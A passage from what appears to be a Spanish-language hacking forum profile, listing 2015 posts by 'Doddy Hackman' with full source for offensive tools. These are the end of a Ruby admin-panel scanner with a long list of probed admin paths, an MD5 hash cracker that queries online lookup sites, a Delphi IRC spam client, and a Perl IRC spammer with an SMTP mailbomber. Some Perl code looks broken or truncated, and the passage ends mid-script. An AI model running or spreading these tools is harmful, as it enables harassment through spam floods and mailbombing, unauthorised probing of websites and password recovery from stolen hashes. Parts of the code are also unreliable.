['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/'] console.insert("end", "[+] Scanning ...\n\n") control = "0" panels.each do |panel| begin url = page+"/"+panel status_code = response_code(url) if status_code=="200" console.insert("end","[+] Link : "+url+"\n") control = "1" end end end if control=="1" console.insert("end","\n[+] Finished") else console.insert("end","\n[-] Not Found") end } place('relx'=>0.3,'rely'=>0.9) end Tk.mainloop #The End ?
Una imagen : Eso es todo.
|
|
|
58
|
Programación / Scripting / [Ruby] MD5 Cracker 0.2
|
en: 29 Mayo 2015, 16:37 pm
|
Un simple script en Ruby para crackear un hash MD5. Version consola : #!usr/bin/ruby #MD5 Cracker 0.2 #(C) Doddy Hackman 2015 require "open-uri" require "net/http" # Functions def toma(web) begin return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read rescue return "Error" end end def response_code(web) begin return Net::HTTP.get_response(URI(web)) .code rescue return "404" end end def tomar(web,arg) begin headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"} uri = URI(web) http = Net::HTTP.new(uri.host, uri.port) return http.post(uri.path,arg, headers).body rescue return "Error" end end def crack(md5) print "\n[+] Cracking ...\n\n" code = tomar("http://md5online.net/index.php","pass="+md5+"&option=hash2text&send=Submit") if code=~/pass : <b>(.*?)<\/b>/ password = $1 print "[+] md5online.net -> "+password+"\n" else print "[-] md5online.net -> Not Found" + "\n" end code = tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php","md5="+md5) if code=~/<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>/ password = $1 print "[+] md5.my-addr.co -> "+password+"\n" else print "[-] md5.my-addr.co -> Not Found" +"\n" end code = tomar("http://md5decryption.com/index.php","hash="+md5+"&submit=Decrypt It!") if code=~/Decrypted Text: <\/b>(.*?)<\/font>/ password = $1 print "[+] md5decryption.com -> "+password+"\n" else print "[-] md5decryption.com -> Not Found"+"\n" end print "\n[+] Finished" end def uso print "\n[+] Sintax : ruby md5cracker.rb <md5>\n" end def head print "\n\n-- == MD5 Cracker 0.2 == --\n\n" end def copyright print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n" end # md5 = ARGV[0] head() if !md5 uso() else crack(md5) end copyright() #The End ?
Version Tk : #!usr/bin/ruby #MD5 Cracker 0.2 #(C) Doddy Hackman 2015 require "tk" require "open-uri" require "net/http" #Functions # Functions def toma(web) begin return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read rescue return "Error" end end def response_code(web) begin return Net::HTTP.get_response(URI(web)) .code rescue return "404" end end def tomar(web,arg) begin headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"} uri = URI(web) http = Net::HTTP.new(uri.host, uri.port) return http.post(uri.path,arg, headers).body rescue return "Error" end end # window = TkRoot.new { title "MD5 Cracker 0.2 (C) Doddy Hackman 2015" ; background "black" } window['geometry'] = '300x300-20+10' TkLabel.new(window) do background "black" foreground "green" text " MD5 : " place('relx'=>"0.1",'rely'=>"0.1") end md5 = TkEntry.new(window){ background "black" foreground "green" width 25 place('relx'=>0.3,'rely'=>0.1) } TkLabel.new(window) do background "black" foreground "green" text "Console" place('relx'=>0.4,'rely'=>0.2) end console =TkText.new(window) do background "black" foreground "green" width 30 height 10 place('relx'=>0.1,'rely'=>0.3) end TkButton.new(window) do text "Crack It" background "black" foreground "green" width 17 activebackground "green" highlightbackground "green" command proc{ md5 = md5.value.to_s console.insert("end","[+] Cracking ...\n\n") code = tomar("http://md5online.net/index.php","pass="+md5+"&option=hash2text&send=Submit") if code=~/pass : <b>(.*?)<\/b>/ password = $1 console.insert("end","[+] md5online.net -> "+password+"\n" ) else console.insert("end","[-] md5online.net -> Not Found" + "\n" ) end code = tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php","md5="+md5) if code=~/<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>/ password = $1 console.insert("end","[+] md5.my-addr.co -> "+password+"\n") else console.insert("end","[-] md5.my-addr.co -> Not Found" +"\n") end code = tomar("http://md5decryption.com/index.php","hash="+md5+"&submit=Decrypt It!") if code=~/Decrypted Text: <\/b>(.*?)<\/font>/ password = $1 console.insert("end","[+] md5decryption.com -> "+password+"\n") else console.insert("end","[-] md5decryption.com -> Not Found"+"\n") end console.insert("end","\n[+] Finished\n" ) } place('relx'=>0.3,'rely'=>0.9) end Tk.mainloop #The End ?
Una imagen : Eso es todo.
|
|
|
59
|
Programación / Programación General / [Delphi] KingSpam 0.4
|
en: 22 Mayo 2015, 17:23 pm
|
Un simple programa para hacer spam en canales IRC , tambien puede listar canales y usuarios. Es algo inestable les recomiendo la version en Perl. Una imagen : // KingSpam 0.4 // (C) Doddy Hackman 2015 unit spam; interface uses Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants, System.Classes, Vcl.Graphics, Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.ComCtrls, Vcl.StdCtrls, Vcl.Imaging.pngimage, Vcl.ExtCtrls, IdContext, IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient, IdCmdTCPClient, IdIRC, PerlRegEx, Vcl.Menus, ShellApi; type TForm1 = class(TForm) PageControl1: TPageControl; TabSheet1: TTabSheet; GroupBox1: TGroupBox; Label1: TLabel; host: TEdit; Label2: TLabel; port: TEdit; Label3: TLabel; nombre: TEdit; Label4: TLabel; canal: TEdit; Label5: TLabel; spam: TEdit; Button1: TButton; Button2: TButton; Button3: TButton; TabSheet2: TTabSheet; GroupBox2: TGroupBox; GroupBox3: TGroupBox; canales: TListBox; users: TListBox; TabSheet3: TTabSheet; GroupBox4: TGroupBox; GroupBox5: TGroupBox; lista_canales: TListBox; console1: TMemo; Label6: TLabel; canal_agregar: TEdit; Button4: TButton; Button5: TButton; TabSheet5: TTabSheet; GroupBox8: TGroupBox; console2: TMemo; IdIRC1: TIdIRC; Button9: TButton; StatusBar1: TStatusBar; GroupBox6: TGroupBox; canal_spam_usuarios: TEdit; TabSheet4: TTabSheet; GroupBox7: TGroupBox; Image2: TImage; Label7: TLabel; PopupMenu1: TPopupMenu; L1: TMenuItem; R1: TMenuItem; OpenDialog1: TOpenDialog; file_spam: TListBox; spam_usuarios: TTimer; Button11: TButton; Button6: TButton; otrospamfile: TListBox; Image3: TImage; procedure Button2Click(Sender: TObject); procedure IdIRC1Raw(ASender: TIdContext; AIn: Boolean; const AMessage: string); procedure Button3Click(Sender: TObject); procedure Button4Click(Sender: TObject); procedure Button5Click(Sender: TObject); procedure Button1Click(Sender: TObject); procedure L1Click(Sender: TObject); procedure R1Click(Sender: TObject); procedure spam_usuariosTimer(Sender: TObject); procedure Button11Click(Sender: TObject); procedure Button6Click(Sender: TObject); procedure FormCreate(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form1: TForm1; buscando_usuarios: string; buscando_canales: string; control_guardar_canales: string; control_guardar_users: string; implementation {$R *.dfm} // Functions procedure savefile(filename, texto: string); var ar: TextFile; begin AssignFile(ar, filename); FileMode := fmOpenWrite; if FileExists(filename) then Append(ar) else Rewrite(ar); Write(ar, texto + sLineBreak); CloseFile(ar); end; procedure TForm1.Button11Click(Sender: TObject); begin StatusBar1.Panels[0].Text := '[+] Finished'; StatusBar1.Update; IdIRC1.Disconnect; spam_usuarios.Enabled := false; end; procedure TForm1.Button1Click(Sender: TObject); var i: integer; contenido: TStringList; stream: TFileStream; begin file_spam.Clear; if OpenDialog1.Execute then begin spam.Text := OpenDialog1.filename; contenido := TStringList.Create; stream := TFileStream.Create((OpenDialog1.filename), fmShareDenyNone); contenido.LoadFromStream(stream); for i := 0 to contenido.Count - 1 do begin file_spam.Items.Add(contenido[i]); end; end; end; procedure TForm1.Button2Click(Sender: TObject); var seleccion: integer; begin canales.Items.Clear; buscando_canales := 'yes'; seleccion := MessageDlg('Save Channels', mtInformation, mbYesNo, 0); if seleccion = mrYes then begin control_guardar_canales := 'yes'; end; StatusBar1.Panels[0].Text := '[+] Searching channels ...'; StatusBar1.Update; // IdIRC1.Disconnect; IdIRC1.Nickname := nombre.Text; IdIRC1.AltNickname := nombre.Text + '123'; IdIRC1.Username := nombre.Text; IdIRC1.RealName := nombre.Text; IdIRC1.Password := ''; IdIRC1.host := host.Text; try begin IdIRC1.Connect; IdIRC1.Raw('LIST'); end; except begin ShowMessage('Error connecting'); end; end; if (FileExists(GetCurrentDir + '/logs/' + host.Text + '_canales.txt')) then begin ShellExecute(Handle, 'open', Pchar(GetCurrentDir + '/logs/' + host.Text + '_canales.txt'), nil, nil, SW_SHOWNORMAL); end; end; procedure TForm1.Button3Click(Sender: TObject); var seleccion: integer; begin users.Items.Clear; buscando_usuarios := 'yes'; seleccion := MessageDlg('Save users', mtInformation, mbYesNo, 0); if seleccion = mrYes then begin control_guardar_users := 'yes'; end; StatusBar1.Panels[0].Text := '[+] Searching users ...'; StatusBar1.Update; // IdIRC1.Disconnect; IdIRC1.Nickname := nombre.Text; IdIRC1.AltNickname := nombre.Text + '123'; IdIRC1.Username := nombre.Text; IdIRC1.RealName := nombre.Text; IdIRC1.Password := ''; IdIRC1.host := host.Text; try begin IdIRC1.Connect; IdIRC1.Join(canal.Text); end; except begin ShowMessage('Error connecting'); end; end; if (FileExists(GetCurrentDir + '/logs/' + canal.Text + '_usuarios.txt')) then begin ShellExecute(Handle, 'open', Pchar(GetCurrentDir + '/logs/' + canal.Text + '_usuarios.txt'), nil, nil, SW_SHOWNORMAL); end; end; procedure TForm1.Button4Click(Sender: TObject); begin lista_canales.Items.Add(canal_agregar.Text); end; procedure TForm1.Button5Click(Sender: TObject); var i: integer; canal_z: string; begin StatusBar1.Panels[0].Text := '[+] Spamming channel ...'; StatusBar1.Update; console1.Clear; try begin IdIRC1.Nickname := nombre.Text; IdIRC1.AltNickname := nombre.Text + '123'; IdIRC1.Username := nombre.Text; IdIRC1.RealName := nombre.Text; IdIRC1.Password := ''; IdIRC1.host := host.Text; IdIRC1.Connect; for i := 0 to lista_canales.Count - 1 do begin canal_z := lista_canales.Items[i]; IdIRC1.Join(canal_z); console1.Lines.Add('[+] Spam in channel : ' + canal_z); IdIRC1.Say(canal_z, file_spam.Items[Random(file_spam.Count - 1) + 0]); Sleep(2000); IdIRC1.Part(canal_z); Sleep(2000); end; end; except ShowMessage('Error connecting'); end; IdIRC1.Disconnect; StatusBar1.Panels[0].Text := '[+] Finished'; StatusBar1.Update; end; procedure TForm1.Button6Click(Sender: TObject); begin StatusBar1.Panels[0].Text := '[+] Spamming users ...'; StatusBar1.Update; IdIRC1.Nickname := nombre.Text; IdIRC1.AltNickname := nombre.Text + '123'; IdIRC1.Username := nombre.Text; IdIRC1.RealName := nombre.Text; IdIRC1.Password := ''; IdIRC1.host := host.Text; try begin IdIRC1.Connect; IdIRC1.Join(canal_spam_usuarios.Text); spam_usuarios.Interval := 10000; spam_usuarios.Enabled := true; end; except begin ShowMessage('Error connecting'); end; end; end; procedure TForm1.FormCreate(Sender: TObject); begin if not DirectoryExists('logs') then begin CreateDir('logs'); end; OpenDialog1.InitialDir := GetCurrentDir; end; procedure TForm1.IdIRC1Raw(ASender: TIdContext; AIn: Boolean; const AMessage: string); var code: string; regex: TPerlRegEx; otroregex: TPerlRegEx; canales_encontrados: string; control: TPerlRegEx; otrocontrol: TPerlRegEx; i: integer; i2: integer; renicks: string; listanow: TStringList; arraynow: array of String; begin code := AMessage; regex := TPerlRegEx.Create(); otroregex := TPerlRegEx.Create(); // console1.Lines.Add(code); regex.regex := '322 (.*?) (.*?) (.*?) :'; regex.Subject := code; if regex.Match then begin canales_encontrados := regex.Groups[2]; canales.Items.Add(canales_encontrados); if (control_guardar_canales = 'yes') then begin savefile('logs/' + host.Text + '_canales.txt', canales_encontrados); end; end; otroregex.regex := '353 (.*) = #(.*) :(.*)'; otroregex.Subject := code; if otroregex.Match then begin renicks := otroregex.Groups[3]; renicks := StringReplace(renicks, nombre.Text, '', []); listanow := TStringList.Create; listanow.Delimiter := ' '; listanow.DelimitedText := renicks; for i2 := 0 to listanow.Count - 1 do begin users.Items.Add(listanow[i2]); if (control_guardar_users = 'yes') then begin savefile('logs/' + canal.Text + '_usuarios.txt', listanow[i2]); end; end; end; control := TPerlRegEx.Create(); control.regex := 'End of /LIST'; control.Subject := code; if control.Match then begin if (buscando_canales = 'yes') then begin ShowMessage('Channels Loaded'); StatusBar1.Panels[0].Text := '[+] Channels Found'; StatusBar1.Update; regex.Free; IdIRC1.Disconnect; IdIRC1.Destroy; buscando_canales := 'no'; end; end; otrocontrol := TPerlRegEx.Create(); otrocontrol.regex := 'End of /NAMES'; otrocontrol.Subject := code; if otrocontrol.Match then begin if (buscando_usuarios = 'yes') then begin ShowMessage('Users Loaded'); StatusBar1.Panels[0].Text := '[+] Users Found'; StatusBar1.Update; otrocontrol.Free; IdIRC1.Part(canal.Text); IdIRC1.Disconnect; IdIRC1.Destroy(); buscando_usuarios := 'no'; end; end; end; procedure TForm1.L1Click(Sender: TObject); var i: integer; contenido: TStringList; stream: TFileStream; begin if OpenDialog1.Execute then begin contenido := TStringList.Create; stream := TFileStream.Create((OpenDialog1.filename), fmShareDenyNone); contenido.LoadFromStream(stream); for i := 0 to contenido.Count - 1 do begin lista_canales.Items.Add(contenido[i]); end; end; end; procedure TForm1.R1Click(Sender: TObject); begin lista_canales.Clear; end; procedure TForm1.spam_usuariosTimer(Sender: TObject); var i: integer; begin for i := 0 to users.Count - 1 do begin StatusBar1.Panels[0].Text := '[+] Spamming to ' + users.Items[i]; StatusBar1.Update; console2.Lines.Add('[+] Spamming to ' + users.Items[i]); IdIRC1.Say(users.Items[i], file_spam.Items[Random(file_spam.Count - 1) + 0]); end; end; end. // The End ?
Si lo quieren bajar lo pueden hacer de aca
|
|
|
60
|
Programación / Scripting / [Perl] King Spam 1.0
|
en: 15 Mayo 2015, 18:25 pm
|
Un simple script en Perl para hacer spam en canales IRC y correos. Tiene las siguientes opciones : - Spammear un canal normalmente o por siempre
- Spammear un servidor entero
- Spammear una lista de servidores y todos sus canales
- Poder elegir un nick para el bot y un timeout
- Permite spammear cuentas de correo
El codigo : #!usr/bin/perl #King Spam 1.0 #(C) Doddy Hackman 2015 # SMTP Servers #smtp.gmail.com - 465 #smtp.mail.yahoo.com -587 use IO::Socket; use Color::Output; Color::Output::Init; use Getopt::Long; #use Win32::OLE; my $nick_secundario = "Cl4ptr4p"; my $timeout_secundario = "5"; GetOptions( "get_channels=s" => \$get_channels, "get_users=s" => \$get_users, "spam_channel=s" => \$spam_channel, "spam_channel_forever=s" => \$spam_channel_forever, "spam_server=s" => \$spam_server, "spam_servers_file=s" => \$spam_servers_file, "spam_targets=s" => \$spam_targets, "spam_file=s" => \$spam_file, "channel=s" => \$channel, "port=s" => \$port, "nick=s" => \$nick, "savefile=s" => \$file, "timeout=s" => \$timeout, "mailbomber" => \$mailbomber ); head(); if ($get_channels) { my $port_now = ""; my $nick_now = ""; my $file_now = ""; if ( !$port ) { $port_now = "6667"; } else { $port_now = $port; } if ( !$nick ) { $nick_now = $nick_secundario; } else { $nick_now = $nick; } if ( !$file ) { $file_now = ""; } else { $file_now = $file; } listar_canales( $get_channels, $port_now, $nick_now, $file_now ); } elsif ($get_users) { my $port_now = ""; my $nick_now = ""; my $file_now = ""; if ( !$port ) { $port_now = "6667"; } else { $port_now = $port; } if ( !$nick ) { $nick_now = $nick_secundario; } else { $nick_now = $nick; } printear_titulo("[+] Serching users ...\n\n"); my @usuarios = buscar_usuarios( $get_users, $port_now, $nick_now, $channel ); if ( int(@usuarios) eq "0" ) { printear("[-] Users not found\n"); } else { printear("[+] Users Found : "); for my $usuario (@usuarios) { printear("[+] User : "); savefile( $file, $usuario ); } } } elsif ($spam_channel) { my $port_now = ""; my $nick_now = ""; my $timeout_now = ""; if ( !$port ) { $port_now = "6667"; } else { $port_now = $port; } if ( !$nick ) { $nick_now = $nick_secundario; } else { $nick_now = $nick; } if ( !$timeout ) { $timeout_now = $timeout_secundario; } else { $timeout_now = $timeout; } spam_canal( $spam_channel, $port_now, $nick_now, $channel, $spam_file, $timeout_now ); } elsif ($spam_channel_forever) { my $port_now = ""; my $nick_now = ""; my $timeout_now = ""; if ( !$port ) { $port_now = "6667"; } else { $port_now = $port; } if ( !$nick ) { $nick_now = $nick_secundario; } else { $nick_now = $nick; } if ( !$timeout ) { $timeout_now = $timeout_secundario; } else { $timeout_now = $timeout; } spam_canal_forever( $spam_channel_forever, $port_now, $nick_now, $channel, $spam_file, $timeout_now ); } elsif ($spam_server) { my $port_now = ""; my $nick_now = ""; my $timeout_now = ""; if ( !$port ) { $port_now = "6667"; } else { $port_now = $port; } if ( !$nick ) { $nick_now = $nick_secundario; } else { $nick_now = $nick; } if ( !$timeout ) { $timeout_now = $timeout_secundario; } else { $timeout_now = $timeout; } my @encontrados = buscar_canales( $spam_server, $port_now, $nick_now ); for my $encontrado (@encontrados) { if ( $encontrado =~ /(.*)-soy_un_limite-(.*)/ ) { my $canal = $1; my $cantidad = $2; spam_canal( $spam_server, $port_now, $nick_now, $canal, $spam_file, $timeout_now ); } } } elsif ($spam_servers_file) { my $port_now = ""; my $nick_now = ""; my $timeout_now = ""; if ( !$port ) { $port_now = "6667"; } else { $port_now = $port; } if ( !$nick ) { $nick_now = $nick_secundario; } else { $nick_now = $nick; } if ( !$timeout ) { $timeout_now = $timeout_secundario; } else { $timeout_now = $timeout; } unless ( -f $spam_servers_file ) { printear("[-] File not found\n\n"); copyright(); } else { my @lista = loadfile($spam_servers_file); printear("[+] Servers Found : "); printear_titulo( "\n-------------------------------------------------------------\n" ); for my $spam_server (@lista) { my @encontrados = buscar_canales( $spam_server, $port_now, $nick_now ); for my $encontrado (@encontrados) { if ( $encontrado =~ /(.*)-soy_un_limite-(.*)/ ) { my $canal = $1; my $cantidad = $2; spam_canal( $spam_server, $port_now, $nick_now, $canal, $spam_file, $timeout_now ); printear_titulo( "\n-------------------------------------------------------------\n" ); } } } } } elsif ($spam_targets) { my $port_now = ""; my $nick_now = ""; my $timeout_now = ""; if ( !$port ) { $port_now = "6667"; } else { $port_now = $port; } if ( !$nick ) { $nick_now = $nick_secundario; } else { $nick_now = $nick; } if ( !$timeout ) { $timeout_now = $timeout_secundario; } else { $timeout_now = $timeout; } if ( -f $spam_targets ) { my @datos = loadfile($spam_targets); printear("[+] Servers Found : "); printear_titulo( "\n-------------------------------------------------------------\n" ); for my $dato (@datos) { if ( $dato =~ /(.*) --- (.*)/ ) { my $server = $1; my $canal = $2; spam_canal( $server, $port_now, $nick_now, $canal, $spam_file, $timeout_now ); printear_titulo( "\n-------------------------------------------------------------\n" ); } } } else { printear("\n[-] File not Found\n\n"); copyright(); } } elsif ($mailbomber) { printear_titulo("[+] Spam Mails : OK\n\n\n"); printear("[+] Host : "); chomp( my $host = <stdin> ); printear("\n[+] Port : "); chomp( my $puerto = <stdin> ); printear("\n[+] Username : "); chomp( my $username = <stdin> ); printear("\n[+] Password : "); chomp( my $password = <stdin> ); printear("\n[+] Count Message : "); chomp( my $count = <stdin> ); printear("\n[+] To : "); chomp( my $to = <stdin> ); printear("\n[+] Subject : "); chomp( my $asunto = <stdin> ); printear("\n[+] Body : "); chomp( my $body = <stdin> ); printear("\n[+] File to Send : "); chomp( my $file = <stdin> ); printear_titulo("\n[+] Starting ...\n\n"); for my $num ( 1 .. $count ) { printear("[+] Sending Message : "); sendmail( $host, $puerto, $username, $password, $username, $username, $username, $to, $asunto, $body, $file ); } printear_titulo("\n[+] Finished\n"); } else { sintax(); } copyright(); # Functions sub spam_canal { my $hostname = $_[0]; my $port = $_[1]; my $nombre = $_[2]; my $canal = $_[3]; my $archivo = $_[4]; printear("[+] Connecting to "); my @nicks = buscar_usuarios( $_[0], $_[1], $_[2], $_[3] ); my $contador = 0; my $termine = 0; my $timeout = $_[5]; my @spamnow = loadfile($archivo); if ( my $socket = new IO::Socket::INET( PeerAddr => $hostname, PeerPort => $port, Proto => "tcp" ) ) { print $socket "NICK $nombre\r\n"; print $socket "USER $nombre 1 1 1 1\r\n"; print $socket "JOIN $canal\r\n"; printear_titulo("[+] Users Found : "); while ( my $log = <$socket> ) { if ( $log =~ /^PING(.*)$/i ) { print $socket "PONG $1\r\n"; } if ( $contador eq "0" ) { printear("[+] Spam in channel : "); print $socket "PRIVMSG $canal " . $spamnow[ rand(@spamnow) ] . "\r\n"; $contador++; } foreach $names (@nicks) { unless ( $nombre eq $names ) { $names =~ s/\@//; $names =~ s/\+//; print $socket "PRIVMSG $names $spamnow[rand(@spamnow)]\r\n"; printear("[+] Spam to user $names : "); } $termine++; } if ( $termine eq int(@nicks) ) { $socket->close(); last; } } } else { printear("[-] Error\n"); $socket->close(); } } sub spam_canal_forever { my $hostname = $_[0]; my $port = $_[1]; my $nombre = $_[2]; my $canal = $_[3]; my $archivo = $_[4]; printear("[+] Connecting to "); my @nicks = buscar_usuarios( $_[0], $_[1], $_[2], $_[3] ); my $contador = 0; my $termine = 0; my $timeout = $_[5]; my @spamnow = loadfile($archivo); if ( my $socket = new IO::Socket::INET( PeerAddr => $hostname, PeerPort => $port, Proto => "tcp" ) ) { print $socket "NICK $nombre\r\n"; print $socket "USER $nombre 1 1 1 1\r\n"; print $socket "JOIN $canal\r\n"; printear_titulo("[+] Users Found : "); while ( my $log = <$socket> ) { while (1) { if ( $log =~ /^PING(.*)$/i ) { print $socket "PONG $1\r\n"; } if ( $contador eq "0" ) { printear("[+] Spam in channel : "); print $socket "PRIVMSG $canal " . $spamnow[ rand(@spamnow) ] . "\r\n"; $contador++; } foreach $names (@nicks) { unless ( $nombre eq $names ) { $names =~ s/\@//; $names =~ s/\+//; "PRIVMSG $names $spamnow[rand(@spamnow)]\r\n"; printear("[+] Spam to user $names : "); } $termine++; } $contador = 0; } if ( $termine eq int(@nicks) ) { $socket->close(); last; } } } else { printear("[-] Error\n"); $socket->close(); } } sub buscar_usuarios { my $hostname = $_[0]; my $port = $_[1]; my $nombre = $_[2]; my $canal = $_[3]; if ( my $socket = new IO::Socket::INET( PeerAddr => $hostname, PeerPort => $port, Proto => "tcp" ) ) { print $socket "NICK $nombre\r\n"; print $socket "USER $nombre 1 1 1 1\r\n"; print $socket "JOIN $canal\r\n"; while ( my $log = <$socket> ) { if ( $log =~ /^PING(.*)$/i ) { print $socket "PONG $1\r\n"; } if ( $log =~ m/:(.*) 353 (.*) = (.*) :(.*)/ig ) { my $pro = $4; $pro =~ s/$nombre//; my @nicks = split " ", $pro; $socket->close(); } } } } sub buscar_canales { my @resultado; my $hostname = $_[0]; my $port = $_[1]; my $nombre = $_[2]; if ( my $socket = new IO::Socket::INET( PeerAddr => $hostname, PeerPort => $port, Proto => "tcp" ) ) { print $socket "NICK $nombre\r\n"; print $socket "USER $nombre 1 1 1 1\r\n"; print $socket "LIST\r\n"; while ( my $log = <$socket> ) { if ( $log =~ /322 (.*?) (.*?) (.*?) :/ ) { my $canal = $2; my $cantidad = $3; push( @resultado, $canal . "-soy_un_limite-" . $cantidad ); } if ( $log =~ /:End of \/LIST/ ) { last; } } $socket->close; } } sub listar_canales { my $host = $_[0]; my $port = $_[1]; my $nick = $_[2]; my $file = $_[3]; printear_titulo("[+] Serching channels ...\n\n"); my @encontrados = buscar_canales( $host, $port, $nick ); if ( int(@encontrados) eq "0" or int(@encontrados) eq "1" ) { printear_titulo("[-] Channels not found\n"); } else { printearf_titulo( "Channels", "Users" ); for my $encontrado (@encontrados) { if ( $encontrado =~ /(.*)-soy_un_limite-(.*)/ ) { my $canal = $1; my $cantidad = $2; printearf( $canal, $cantidad ); if ( $file ne "" ) { savefile( $file, $canal ); } } } } } sub sendmail { ## Function Based on : http://code.activestate.com/lists/pdk/5351/ ## Credits : Thanks to Phillip Richcreek and Eric Promislow my ( $host, $port, $username, $password, $from, $cc, $bcc, $to, $asunto, $mensaje, $file ) = @_; $correo = Win32::OLE->new('CDO.Message'); $correo->Configuration->Fields->SetProperty( "Item", 'http://schemas.microsoft.com/cdo/configuration/sendusername', $username ); $correo->Configuration->Fields->SetProperty( "Item", 'http://schemas.microsoft.com/cdo/configuration/sendpassword', $password ); $correo->Configuration->Fields->SetProperty( "Item", 'http://schemas.microsoft.com/cdo/configuration/smtpserver', $host ); $correo->Configuration->Fields->SetProperty( "Item", 'http://schemas.microsoft.com/cdo/configuration/smtpserverport', $port ); $correo->Configuration->Fields->SetProperty( "Item", 'http://schemas.microsoft.com/cdo/configuration/smtpusessl', 1 ); $correo->Configuration->Fields->SetProperty( "Item", 'http://schemas.microsoft.com/cdo/configuration/sendusing', 2 ); $correo->Configuration->Fields->SetProperty( "Item", 'http://schemas.microsoft.com/cdo/configuration/smtpauthenticate', 1 ); $correo->Configuration->Fields->Update(); if ( -f $file ) { $correo->AddAttachment($file); } $correo->{From} = $from; $correo->{CC} = $cc; $correo->{BCC} = $bcc; $correo->{To} = $to; $correo->{Subject} = $asunto; $correo->{TextBody} = $mensaje; $correo->Send(); } # More Functions sub printearf_titulo { cprintf( "\x0310" . "%-32s %s" . "\x030\n", $_[0], $_[1] ); } sub printearf { cprintf( "\x036" . "%-32s %s" . "\x030\n", $_[0], $_[1] ); } sub printear { cprint( "\x036" . $_[0] . "\x030" ); } sub printear_logo { cprint( "\x037" . $_[0] . "\x030" ); } sub printear_titulo { cprint( "\x0310" . $_[0] . "\x030" ); } sub savefile { open( SAVE , ">>" . $_[0] ); } sub loadfile { if ( -f $_[0] ) { my @words; my @r; @words = <FILE>; for (@words) { } } else { printear("\n[-] File not found\n\n"); copyright(); } } sub sintax { printear("[+] Sintax : "); print "perl $0 <option> <value>\n"; printear("\n[+] Options : \n\n"); "-get_channels <host> -port <port> -nick <nick> -savefile <file> : Get & Save Channels of a server\n"; "-get_users <host> -port <port> -channel <channel> -nick <nick> -savefile <file> : Get & Save Channels of a server\n"; "-spam_channel <host> -port <port> -channel <channel> -nick <nick> 